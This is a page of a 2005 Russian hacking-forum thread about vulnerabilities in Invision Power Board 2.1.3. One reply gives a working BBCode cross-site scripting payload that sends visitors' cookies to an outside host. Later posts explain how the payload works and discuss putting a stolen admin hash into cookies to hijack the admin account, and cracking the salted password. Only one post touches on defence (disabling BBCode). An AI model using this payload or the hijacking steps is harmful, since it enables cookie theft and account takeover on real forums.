Форум АНТИЧАТ
Страница 1 из 3 1 2 3 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Вопрос про уязвимости в IPB v2.1.3 (https://forum.antichat.xyz/showthread.php?t=12259)

Destroyer 28.12.2005 19:26
Вопрос про уязвимости в IPB v2.1.3
 
Не подскажите какие уязвимости присутствуют в Invision Power Board (Free Trial) v2.1.3 © 2005 а то ни где не нашёл!

1251soldier 28.12.2005 21:12
Код HTML:
[email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
Ploho ishesh

Destroyer 28.12.2005 21:22
Спасибо попробую

Diablo 31.12.2005 18:54
А как от этого защитится ?

Arthas 01.01.2006 17:36
ребята, вставляю хеш и ид админа в куки (речь идет о ипб 2.1.3) но всё ровно не могу зайти под админом, хотя в ипб 1.3 всё отлично работает. в чём дело не подскажете?

Grema 01.01.2006 21:26
Потому что в 2.х в админке еще раз проверяеться пасс...
тебе надо пасс админа а не кго куки.
а так как это 2.х ты не разшифруеш мд5 без соли...
разшифровывай и заходи в админку

Barsik 02.01.2006 00:14
Цитата:
Сообщение от Diablo
А как от этого защитится ?
Вроде выключить bb код

muse 03.01.2006 16:17
Цитата:
Сообщение от 1251soldier
Код HTML:
[email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
Ploho ishesh
narod objasnite plizz soderjimoe etogo koda
wj@wj - leviy email
http://www.wj.com - leviy url a za4em tam `=`?
nu dalwe vrode vse ponatno...
pasipa

FQziT 03.01.2006 16:25
` - это символ обратного апострофа, он является ограничителем атрибутов, но только в IE.

maXaTTAck 03.01.2006 17:14
Эти адреса не важны вообще: можешь поставить вместо их что-угодно.


Время: 21:15
Страница 1 из 3 1 2 3 >
Показывать 40 сообщений этой темы на одной странице